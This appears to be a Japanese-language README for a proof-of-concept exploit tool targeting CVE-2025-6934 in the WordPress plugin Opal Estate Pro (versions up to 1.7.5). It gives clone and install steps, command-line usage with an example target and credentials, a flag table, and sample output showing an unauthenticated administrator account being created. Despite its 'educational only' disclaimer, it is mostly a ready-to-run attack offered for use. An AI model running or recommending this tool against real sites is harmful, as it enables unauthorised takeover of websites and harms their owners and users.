
WordPress Opal Estate Pro向けの自動化されたPoCエクスプロイト。脆弱なバージョンを検出し、nonceを取得して、管理者アカウントを不正に作成します。
CVE-2025-6934 は、WordPress プラグイン: Opal Estate Pro ≤ 1.7.5 を対象とした概念実証 (PoC) エクスプロイトです。
このエクスプロイトは、認証なしでの管理者アカウント作成を実証します。
免責事項: この PoC は教育目的のみです。許可なくシステムで使用 しないで ください。
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
要件:
requests、beautifulsoup4、colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Flag | 説明 | 必須 | デフォルト |
|---|---|---|---|
-u, --url | 対象サイトのURL | はい | - |
-mail, --newmail | 新しい管理者のメールアドレス | はい | - |
-password, --newpassword | 新しい管理者のパスワード | はい | - |
-user, --username | 新しい管理者のユーザー名 | いいえ | administrator |
コンソールには以下が表示されます:
[•][✔][✖][i]例:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
私はツールの構築と知識の共有を楽しむアクティブな開発者です。以下の方法で連絡できます: